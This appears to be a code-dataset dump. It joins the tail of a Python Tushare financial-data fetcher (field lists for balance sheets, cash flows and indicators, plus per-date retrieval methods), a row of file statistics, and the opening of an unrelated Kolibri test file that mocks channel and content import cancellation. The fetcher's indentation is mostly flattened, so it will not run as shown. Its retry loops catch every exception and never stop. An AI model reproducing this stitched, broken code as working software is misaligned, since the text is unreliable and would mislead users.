come,oth_eqt_tools,oth_eqt_tools_p_shr,lending_funds,acc_receivable,st_fin_payable,payables,hfs_assets,hfs_sales,cost_fin_assets,fair_value_fin_assets,cip_total,oth_pay_total,long_pay_total,debt_invest,oth_debt_invest,oth_eq_invest,oth_illiq_fin_assets,oth_eq_ppbond,receiv_financing,use_right_assets,lease_liab,contract_assets,contract_liab,accounts_receiv_bill,accounts_pay,oth_rcv_total,fix_assets_total',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'total_share', 'cap_rese', 'undistr_porfit', 'surplus_rese', 'special_rese', 'money_cap', 'trad_asset', 'notes_receiv', 'accounts_receiv', 'oth_receiv', 'prepayment', 'div_receiv', 'int_receiv', 'inventories', 'amor_exp', 'nca_within_1y', 'sett_rsrv', 'loanto_oth_bank_fi', 'premium_receiv', 'reinsur_receiv', 'reinsur_res_receiv', 'pur_resale_fa', 'oth_cur_assets', 'total_cur_assets', 'fa_avail_for_sale', 'htm_invest', 'lt_eqt_invest', 'invest_real_estate', 'time_deposits', 'oth_assets', 'lt_rec', 'fix_assets', 'cip', 'const_materials', 'fixed_assets_disp', 'produc_bio_assets', 'oil_and_gas_assets', 'intan_assets', 'r_and_d', 'goodwill', 'lt_amor_exp', 'defer_tax_assets', 'decr_in_disbur', 'oth_nca', 'total_nca', 'cash_reser_cb', 'depos_in_oth_bfi', 'prec_metals', 'deriv_assets', 'rr_reins_une_prem', 'rr_reins_outstd_cla', 'rr_reins_lins_liab', 'rr_reins_lthins_liab', 'refund_depos', 'ph_pledge_loans', 'refund_cap_depos', 'indep_acct_assets', 'client_depos', 'client_prov', 'transac_seat_fee', 'invest_as_receiv', 'total_assets', 'lt_borr', 'st_borr', 'cb_borr', 'depos_ib_deposits', 'loan_oth_bank', 'trading_fl', 'notes_payable', 'acct_payable', 'adv_receipts', 'sold_for_repur_fa', 'comm_payable', 'payroll_payable', 'taxes_payable', 'int_payable', 'div_payable', 'oth_payable', 'acc_exp', 'deferred_inc', 'st_bonds_payable', 'payable_to_reinsurer', 'rsrv_insur_cont', 'acting_trading_sec', 'acting_uw_sec', 'non_cur_liab_due_1y', 'oth_cur_liab', 'total_cur_liab', 'bond_payable', 'lt_payable', 'specific_payables', 'estimated_liab', 'defer_tax_liab', 'defer_inc_non_cur_liab', 'oth_ncl', 'total_ncl', 'depos_oth_bfi', 'deriv_liab', 'depos', 'agency_bus_liab', 'oth_liab', 'prem_receiv_adva', 'depos_received', 'ph_invest', 'reser_une_prem', 'reser_outstd_claims', 'reser_lins_liab', 'reser_lthins_liab', 'indept_acc_liab', 'pledge_borr', 'indem_payable', 'policy_div_payable', 
'total_liab', 'treasury_share', 'ordin_risk_reser', 'forex_differ', 'invest_loss_unconf', 'minority_int', 'total_hldr_eqy_exc_min_int', 'total_hldr_eqy_inc_min_int', 'total_liab_hldr_eqy', 'lt_payroll_payable', 'oth_comp_income', 'oth_eqt_tools', 'oth_eqt_tools_p_shr', 'lending_funds', 'acc_receivable', 'st_fin_payable', 'payables', 'hfs_assets', 'hfs_sales', 'cost_fin_assets', 'fair_value_fin_assets', 'cip_total', 'oth_pay_total', 'long_pay_total', 'debt_invest', 'oth_debt_invest', 'oth_eq_invest', 'oth_illiq_fin_assets', 'oth_eq_ppbond', 'receiv_financing', 'use_right_assets', 'lease_liab', 'contract_assets', 'contract_liab', 'accounts_receiv_bill', 'accounts_pay', 'oth_rcv_total', 'fix_assets_total']
},
'STATEMENTS_OF_CASH_FLOWS':{
'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,net_profit,finan_exp,c_fr_sale_sg,recp_tax_rends,n_depos_incr_fi,n_incr_loans_cb,n_inc_borr_oth_fi,prem_fr_orig_contr,n_incr_insured_dep,n_reinsur_prem,n_incr_disp_tfa,ifc_cash_incr,n_incr_disp_faas,n_incr_loans_oth_bank,n_cap_incr_repur,c_fr_oth_operate_a,c_inf_fr_operate_a,c_paid_goods_s,c_paid_to_for_empl,c_paid_for_taxes,n_incr_clt_loan_adv,n_incr_dep_cbob,c_pay_claims_orig_inco,pay_handling_chrg,pay_comm_insur_plcy,oth_cash_pay_oper_act,st_cash_out_act,n_cashflow_act,oth_recp_ral_inv_act,c_disp_withdrwl_invest,c_recp_return_invest,n_recp_disp_fiolta,n_recp_disp_sobu,stot_inflows_inv_act,c_pay_acq_const_fiolta,c_paid_invest,n_disp_subs_oth_biz,oth_pay_ral_inv_act,n_incr_pledge_loan,stot_out_inv_act,n_cashflow_inv_act,c_recp_borrow,proc_issue_bonds,oth_cash_recp_ral_fnc_act,stot_cash_in_fnc_act,free_cashflow,c_prepay_amt_borr,c_pay_dist_dpcp_int_exp,incl_dvd_profit_paid_sc_ms,oth_cashpay_ral_fnc_act,stot_cashout_fnc_act,n_cash_flows_fnc_act,eff_fx_flu_cash,n_incr_cash_cash_equ,c_cash_equ_beg_period,c_cash_equ_end_period,c_recp_cap_contrib,incl_cash_rec_saims,uncon_invest_loss,prov_depr_assets,depr_fa_coga_dpba,amort_intang_assets,lt_amort_deferred_exp,decr_deferred_exp,incr_acc_exp,loss_disp_fiolta,loss_scr_fa,loss_fv_chg,invest_loss,decr_def_inc_tax_assets,incr_def_inc_tax_liab,decr_inventories,decr_oper_payable,incr_oper_payable,others,im_net_cashflow_oper_act,conv_debt_into_cap,conv_copbonds_due_within_1y,fa_fnc_leases,im_n_incr_cash_equ,net_dism_capital_add,net_cash_rece_sec,credit_impa_loss,use_right_asset_dep,oth_loss_asset,end_bal_cash,beg_bal_cash,end_bal_cash_equ,beg_bal_cash_equ',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'net_profit', 'finan_exp', 'c_fr_sale_sg', 'recp_tax_rends', 'n_depos_incr_fi', 'n_incr_loans_cb', 'n_inc_borr_oth_fi', 'prem_fr_orig_contr', 'n_incr_insured_dep', 'n_reinsur_prem', 'n_incr_disp_tfa', 'ifc_cash_incr', 'n_incr_disp_faas', 'n_incr_loans_oth_bank', 'n_cap_incr_repur', 'c_fr_oth_operate_a', 'c_inf_fr_operate_a', 'c_paid_goods_s', 'c_paid_to_for_empl', 'c_paid_for_taxes', 'n_incr_clt_loan_adv', 'n_incr_dep_cbob', 'c_pay_claims_orig_inco', 'pay_handling_chrg', 'pay_comm_insur_plcy', 'oth_cash_pay_oper_act', 'st_cash_out_act', 'n_cashflow_act', 'oth_recp_ral_inv_act', 'c_disp_withdrwl_invest', 'c_recp_return_invest', 'n_recp_disp_fiolta', 'n_recp_disp_sobu', 'stot_inflows_inv_act', 'c_pay_acq_const_fiolta', 'c_paid_invest', 'n_disp_subs_oth_biz', 'oth_pay_ral_inv_act', 'n_incr_pledge_loan', 'stot_out_inv_act', 'n_cashflow_inv_act', 'c_recp_borrow', 'proc_issue_bonds', 'oth_cash_recp_ral_fnc_act', 'stot_cash_in_fnc_act', 'free_cashflow', 'c_prepay_amt_borr', 'c_pay_dist_dpcp_int_exp', 'incl_dvd_profit_paid_sc_ms', 'oth_cashpay_ral_fnc_act', 'stot_cashout_fnc_act', 'n_cash_flows_fnc_act', 'eff_fx_flu_cash', 'n_incr_cash_cash_equ', 'c_cash_equ_beg_period', 'c_cash_equ_end_period', 'c_recp_cap_contrib', 'incl_cash_rec_saims', 'uncon_invest_loss', 'prov_depr_assets', 'depr_fa_coga_dpba', 'amort_intang_assets', 'lt_amort_deferred_exp', 'decr_deferred_exp', 'incr_acc_exp', 'loss_disp_fiolta', 'loss_scr_fa', 'loss_fv_chg', 'invest_loss', 'decr_def_inc_tax_assets', 'incr_def_inc_tax_liab', 'decr_inventories', 'decr_oper_payable', 'incr_oper_payable', 'others', 'im_net_cashflow_oper_act', 'conv_debt_into_cap', 'conv_copbonds_due_within_1y', 'fa_fnc_leases', 'im_n_incr_cash_equ', 'net_dism_capital_add', 'net_cash_rece_sec', 'credit_impa_loss', 'use_right_asset_dep', 'oth_loss_asset', 'end_bal_cash', 'beg_bal_cash', 'end_bal_cash_equ', 'beg_bal_cash_equ']
},
'INCOME_FORECASTS':{
'raw': 'ts_code,ann_date,end_date,type,p_change_min,p_change_max,net_profit_min,net_profit_max,last_parent_net,first_ann_date,summary,change_reason',
'ordered': ['ts_code', 'ann_date', 'end_date', 'type', 'p_change_min', 'p_change_max', 'net_profit_min', 'net_profit_max', 'last_parent_net', 'first_ann_date', 'summary', 'change_reason']
},
'FINANCIAL_INDICATORS':{
            'raw': 'ts_code,ann_date,end_date,eps,dt_eps,total_revenue_ps,revenue_ps,capital_rese_ps,surplus_rese_ps,undist_profit_ps,extra_item,profit_dedt,gross_margin,current_ratio,quick_ratio,cash_ratio,invturn_days,arturn_days,inv_turn,ar_turn,ca_turn,fa_turn,assets_turn,op_income,valuechange_income,interst_income,daa,ebit,ebitda,fcff,fcfe,current_exint,noncurrent_exint,interestdebt,netdebt,tangible_asset,working_capital,networking_capital,invest_capital,retained_earnings,diluted2_eps,bps,ocfps,retainedps,cfps,ebit_ps,fcff_ps,fcfe_ps,netprofit_margin,grossprofit_margin,cogs_of_sales,expense_of_sales,profit_to_gr,saleexp_to_gr,adminexp_of_gr,finaexp_of_gr,impai_ttm,gc_of_gr,op_of_gr,ebit_of_gr,roe,roe_waa,roe_dt,roa,npta,roic,roe_yearly,roa2_yearly,roe_avg,opincome_of_ebt,investincome_of_ebt,n_op_profit_of_ebt,tax_to_ebt,dtprofit_to_profit,salescash_to_or,ocf_to_or,ocf_to_opincome,capitalized_to_da,debt_to_assets,assets_to_eqt,dp_assets_to_eqt,ca_to_assets,nca_to_assets,tbassets_to_totalassets,int_to_talcap,eqt_to_talcapital,currentdebt_to_debt,longdeb_to_debt,ocf_to_shortdebt,debt_to_eqt,eqt_to_debt,eqt_to_interestdebt,tangibleasset_to_debt,tangasset_to_intdebt,tangibleasset_to_netdebt,ocf_to_debt,ocf_to_interestdebt,ocf_to_netdebt,ebit_to_interest,longdebt_to_workingcapital,ebitda_to_debt,turn_days,roa_yearly,roa_dp,fixed_assets,profit_prefin_exp,non_op_profit,op_to_ebt,nop_to_ebt,ocf_to_profit,cash_to_liqdebt,cash_to_liqdebt_withinterest,op_to_liqdebt,op_to_debt,roic_yearly,total_fa_trun,profit_to_op,q_opincome,q_investincome,q_dtprofit,q_eps,q_netprofit_margin,q_gsprofit_margin,q_exp_to_sales,q_profit_to_gr,q_saleexp_to_gr,q_adminexp_to_gr,q_finaexp_to_gr,q_impair_to_gr_ttm,q_gc_to_gr,q_op_to_gr,q_roe,q_dt_roe,q_npta,q_opincome_to_ebt,q_investincome_to_ebt,q_dtprofit_to_profit,q_salescash_to_or,q_ocf_to_sales,q_ocf_to_or,basic_eps_yoy,dt_eps_yoy,cfps_yoy,op_yoy,ebt_yoy,netprofit_yoy,dt_netprofit_yoy,ocf_yoy,roe_yoy,bps_yoy,assets_yoy,eqt_yoy,tr_yoy,or_yoy,q_gr_yoy,q_gr_'
                   'qoq,q_sales_yoy,q_sales_qoq,q_op_yoy,q_op_qoq,q_profit_yoy,q_profit_qoq,q_netprofit_yoy,q_netprofit_qoq,equity_yoy,rd_exp',
'ordered': ['ts_code', 'ann_date', 'end_date', 'eps', 'dt_eps', 'total_revenue_ps', 'revenue_ps', 'capital_rese_ps', 'surplus_rese_ps', 'undist_profit_ps', 'extra_item', 'profit_dedt', 'gross_margin', 'current_ratio', 'quick_ratio', 'cash_ratio', 'invturn_days', 'arturn_days', 'inv_turn', 'ar_turn', 'ca_turn', 'fa_turn', 'assets_turn', 'op_income', 'valuechange_income', 'interst_income', 'daa', 'ebit', 'ebitda', 'fcff', 'fcfe', 'current_exint', 'noncurrent_exint', 'interestdebt', 'netdebt', 'tangible_asset', 'working_capital', 'networking_capital', 'invest_capital', 'retained_earnings', 'diluted2_eps', 'bps', 'ocfps', 'retainedps', 'cfps', 'ebit_ps', 'fcff_ps', 'fcfe_ps', 'netprofit_margin', 'grossprofit_margin', 'cogs_of_sales', 'expense_of_sales', 'profit_to_gr', 'saleexp_to_gr', 'adminexp_of_gr', 'finaexp_of_gr', 'impai_ttm', 'gc_of_gr', 'op_of_gr', 'ebit_of_gr', 'roe', 'roe_waa', 'roe_dt', 'roa', 'npta', 'roic', 'roe_yearly', 'roa2_yearly', 'roe_avg', 'opincome_of_ebt', 'investincome_of_ebt', 'n_op_profit_of_ebt', 'tax_to_ebt', 'dtprofit_to_profit', 'salescash_to_or', 'ocf_to_or', 'ocf_to_opincome', 'capitalized_to_da', 'debt_to_assets', 'assets_to_eqt', 'dp_assets_to_eqt', 'ca_to_assets', 'nca_to_assets', 'tbassets_to_totalassets', 'int_to_talcap', 'eqt_to_talcapital', 'currentdebt_to_debt', 'longdeb_to_debt', 'ocf_to_shortdebt', 'debt_to_eqt', 'eqt_to_debt', 'eqt_to_interestdebt', 'tangibleasset_to_debt', 'tangasset_to_intdebt', 'tangibleasset_to_netdebt', 'ocf_to_debt', 'ocf_to_interestdebt', 'ocf_to_netdebt', 'ebit_to_interest', 'longdebt_to_workingcapital', 'ebitda_to_debt', 'turn_days', 'roa_yearly', 'roa_dp', 'fixed_assets', 'profit_prefin_exp', 'non_op_profit', 'op_to_ebt', 'nop_to_ebt', 'ocf_to_profit', 'cash_to_liqdebt', 'cash_to_liqdebt_withinterest', 'op_to_liqdebt', 'op_to_debt', 'roic_yearly', 'total_fa_trun', 'profit_to_op', 'q_opincome', 'q_investincome', 'q_dtprofit', 'q_eps', 'q_netprofit_margin', 'q_gsprofit_margin', 'q_exp_to_sales', 
'q_profit_to_gr', 'q_saleexp_to_gr', 'q_adminexp_to_gr', 'q_finaexp_to_gr', 'q_impair_to_gr_ttm', 'q_gc_to_gr', 'q_op_to_gr', 'q_roe', 'q_dt_roe', 'q_npta', 'q_opincome_to_ebt', 'q_investincome_to_ebt', 'q_dtprofit_to_profit', 'q_salescash_to_or', 'q_ocf_to_sales', 'q_ocf_to_or', 'basic_eps_yoy', 'dt_eps_yoy', 'cfps_yoy', 'op_yoy', 'ebt_yoy', 'netprofit_yoy', 'dt_netprofit_yoy', 'ocf_yoy', 'roe_yoy', 'bps_yoy', 'assets_yoy', 'eqt_yoy', 'tr_yoy', 'or_yoy', 'q_gr_yoy', 'q_gr_qoq', 'q_sales_yoy', 'q_sales_qoq', 'q_op_yoy', 'q_op_qoq', 'q_profit_yoy', 'q_profit_qoq', 'q_netprofit_yoy', 'q_netprofit_qoq', 'equity_yoy', 'rd_exp']
},
}
def _get_fields(self, table_name):
return self.fields[table_name]['raw']
def _change_order(self, table_name, dataframe):
cols = self.fields[table_name]['ordered']
dataframe = dataframe[cols]
return dataframe
@staticmethod
def _trim_date_list(date_list, start_date):
return date_list[date_list > start_date]
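    # Illustrative example (not part of the class): trade dates are YYYYMMDD
    # strings, so the lexicographic comparison above matches chronological
    # order. Assuming a hypothetical holder class named `DataGetter`:
    #
    #     dates = pd.Series(['20210930', '20211231', '20220331'])
    #     DataGetter._trim_date_list(dates, '20211231')
    #     # keeps only '20220331' -- strictly greater dates survive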
# def get_index_list(self):
# table_name = 'INDEX_LIST'
# fields = self._get_fields(table_name)
# data = self._change_order(table_name, pd.concat([
# self.query('index_basic', market='SSE', fields=fields),
# self.query('index_basic', market='SZSE', fields=fields),
# self.query('index_basic', market='MSCI', fields=fields),
# self.query('index_basic', market='CSI', fields=fields),
# self.query('index_basic', market='CICC', fields=fields),
# self.query('index_basic', market='SW', fields=fields),
# self.query('index_basic', market='OTH', fields=fields)
# ], axis=0).reset_index(drop=True).fillna('NULL'))
# return self.convert_header(table_name, data)
def get_stock_list(self, fill_controller):
table_name = 'STOCK_LIST'
fields = self._get_fields(table_name)
        # Cross both exchanges with every listing status
        # (L = listed, P = paused listing, D = delisted)
        data = self._change_order(table_name, pd.concat([
            self.query('stock_basic', exchange=exchange,
                       list_status=list_status, fields=fields)
            for exchange in ('SSE', 'SZSE')
            for list_status in ('L', 'P', 'D')
        ], axis=0).reset_index(drop=True).fillna('NULL'))
        # Map the retired SZSE SME Board label ("中小板") onto the Main Board
        # ("主板"); the SME Board was merged into the Main Board in 2021.
data = data.replace({"中小板": "主板"})
self.stock_list = data['ts_code']
return self.convert_header(table_name, data)
def _get_indices(self, table_name, frequency='daily'):
fields = self._get_fields(table_name)
        # Tushare returns index bars newest-first; .iloc[::-1] restores
        # chronological order before the two indices are stacked.
data = self._change_order(table_name, pd.concat([
self.query(f'index_{frequency}',
ts_code='000001.SH', fields=fields).iloc[::-1],
self.query(f'index_{frequency}',
ts_code='399001.SZ', fields=fields).iloc[::-1]
], axis=0).reset_index(drop=True).fillna('NULL'))
self.trade_date_list[frequency] = data['trade_date']
data = self.convert_header(table_name, data)
return data
def get_indices_daily(self, fill_controller):
return self._get_indices('INDICES_DAILY')
def get_indices_weekly(self, fill_controller):
return self._get_indices('INDICES_WEEKLY', 'weekly')
def get_indices_monthly(self, fill_controller):
return self._get_indices('INDICES_MONTHLY', 'monthly')
def _get_quotations(self, table_name, fill_controller, frequency='daily'):
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list[frequency]
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
            # Retry forever on any exception (e.g. Tushare rate limiting);
            # there is no backoff or attempt cap, so a persistent failure
            # will spin here. The same pattern recurs in the methods below.
while True:
try:
next_data = self.query(
frequency, trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = self._change_order(
table_name, data.reset_index(drop=True).fillna('NULL'))
data = self.convert_header(table_name, data)
return data
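    # Design note: a bounded alternative to the bare `while True` retry above
    # (sketch only; MAX_RETRIES is a hypothetical constant, `time` would need
    # to be imported) could look like:
    #
    #     for attempt in range(MAX_RETRIES):
    #         try:
    #             next_data = self.query(frequency, trade_date=trade_date,
    #                                    fields=fields)
    #             break
    #         except Exception:
    #             time.sleep(2 ** attempt)  # exponential backoff
    #     else:
    #         raise RuntimeError('query kept failing; giving up')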
def get_quotations_daily(self, fill_controller):
return self._get_quotations('QUOTATIONS_DAILY', fill_controller)
def get_quotations_weekly(self, fill_controller):
return self._get_quotations('QUOTATIONS_WEEKLY', fill_controller, 'weekly')
def get_quotations_monthly(self, fill_controller):
return self._get_quotations('QUOTATIONS_MONTHLY', fill_controller, 'monthly')
def get_stock_indicators_daily(self, fill_controller):
table_name = 'STOCK_INDICATORS_DAILY'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("daily_basic", trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
else:
for stock in pb(self.stock_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
                        next_data = self.query("daily_basic", ts_code=stock, fields=fields).reset_index(drop=True).fillna('NULL')
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_limits_statistic(self, fill_controller):
table_name = 'LIMITS_STATISTIC'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query(
'limit_list', trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = data.reset_index(drop=True).fillna('NULL')
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_adj_factors(self, fill_controller):
table_name = 'ADJ_FACTORS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query(
'adj_factor', ts_code='', trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = data.reset_index(drop=True).fillna('NULL')
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_income_statements(self, fill_controller):
table_name = 'INCOME_STATEMENTS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
                    next_data = self._change_order(table_name, pd.concat([
                        # Tushare splits each statement into report types 1-12
                        # (consolidated, parent-company, adjusted, ...);
                        # fetch all of them for this period and stack them.
                        self.query("income_vip", period=date,
                                   report_type=report_type, fields=fields)
                        for report_type in range(1, 13)
                    ], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_balance_sheets(self, fill_controller):
table_name = 'BALANCE_SHEETS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
                    next_data = self._change_order(table_name, pd.concat([
                        # fetch all twelve Tushare report types for this period
                        self.query("balancesheet_vip", period=date,
                                   report_type=report_type, fields=fields)
                        for report_type in range(1, 13)
                    ], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_cash_flows(self, fill_controller):
table_name = 'STATEMENTS_OF_CASH_FLOWS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
                    next_data = self._change_order(table_name, pd.concat([
                        # fetch all twelve Tushare report types for this period
                        self.query("cashflow_vip", period=date,
                                   report_type=report_type, fields=fields)
                        for report_type in range(1, 13)
                    ], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_income_forecasts(self, fill_controller):
table_name = 'INCOME_FORECASTS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("forecast_vip", period=date, fields=fields).reset_index(drop=True).fillna('NULL')
next_data = self._change_order(table_name, next_data)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_financial_indicators(self, fill_controller):
table_name = 'FINANCIAL_INDICATORS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("fina_indicator_vip", period=date, fields=fields).reset_index(drop=True).fillna('NULL')
next_data = self._change_order(table_name, next_data)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
| 83.725877 | 2,723 | 0.669321 | 5,248 | 38,179 | 4.383956 | 0.110518 | 0.02434 | 0.030599 | 0.040162 | 0.929282 | 0.914809 | 0.904377 | 0.889903 | 0.870605 | 0.864737 | 0 | 0.003418 | 0.210666 | 38,179 | 455 | 2,724 | 83.90989 | 0.760021 | 0.018413 | 0 | 0.668293 | 0 | 0.017073 | 0.468274 | 0.241157 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05122 | false | 0 | 0.014634 | 0.019512 | 0.139024 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2af61c21b0b6b9dcfb4459690a51f57ea18cb47b | 19,925 | py | Python | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | kolibri/core/content/test/test_import_export.py | arceduardvincent/kolibri | 26073dda2569bb38bfe1e08ba486e96f650d10ce | [
"MIT"
] | null | null | null | import os
import tempfile
from django.core.management import call_command
from django.test import TestCase
from mock import call
from mock import patch
from requests.exceptions import ConnectionError
from requests.exceptions import HTTPError
from kolibri.core.content.models import LocalFile
from kolibri.utils.tests.helpers import override_option
@patch('kolibri.core.content.management.commands.importchannel.channel_import.import_channel_from_local_db')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.start_progress')
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ImportChannelTestCase(TestCase):
"""
Test case for the importchannel management command.
"""
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_url')
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.importchannel.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.cancel', return_value=True)
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.is_cancelled', return_value=True)
def test_remote_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock, start_progress_mock,
import_channel_mock):
local_path = tempfile.mkstemp()[1]
local_path_mock.return_value = local_path
remote_path_mock.return_value = 'notest'
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importchannel", "network", self.the_channel_id)
# Check that is_cancelled was called
is_cancelled_mock.assert_called_with()
# Check that the FileDownload initiated
FileDownloadMock.assert_called_with('notest', local_path)
# Check that cancel was called
cancel_mock.assert_called_with()
# Test that import channel cleans up database file if cancelled
self.assertFalse(os.path.exists(local_path))
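    # Note on mock argument order: stacked @patch decorators apply bottom-up,
    # so the @patch closest to the method supplies the first mock parameter
    # (`is_cancelled_mock` here), while the class-level patches arrive last
    # (`start_progress_mock`, then `import_channel_mock`).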
@patch('kolibri.core.content.management.commands.importchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.importchannel.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.cancel', return_value=True)
@patch('kolibri.core.content.management.commands.importchannel.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock, import_channel_mock):
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_dest_path, local_src_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importchannel", "disk", self.the_channel_id, tempfile.mkdtemp())
# Check that is_cancelled was called
is_cancelled_mock.assert_called_with()
# Check that the FileCopy initiated
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
# Check that cancel was called
cancel_mock.assert_called_with()
# Test that import channel cleans up database file if cancelled
self.assertFalse(os.path.exists(local_dest_path))
@patch('kolibri.core.content.management.commands.importcontent.annotation')
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ImportContentTestCase(TestCase):
"""
Test case for the importcontent management command.
"""
fixtures = ['content_test.json']
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
def setUp(self):
LocalFile.objects.update(available=False)
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', return_value=True)
def test_remote_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileDownloadMock, annotation_mock):
# Check behaviour if cancellation is called before any file download starts
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
is_cancelled_mock.assert_has_calls([call(), call()])
FileDownloadMock.assert_not_called()
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
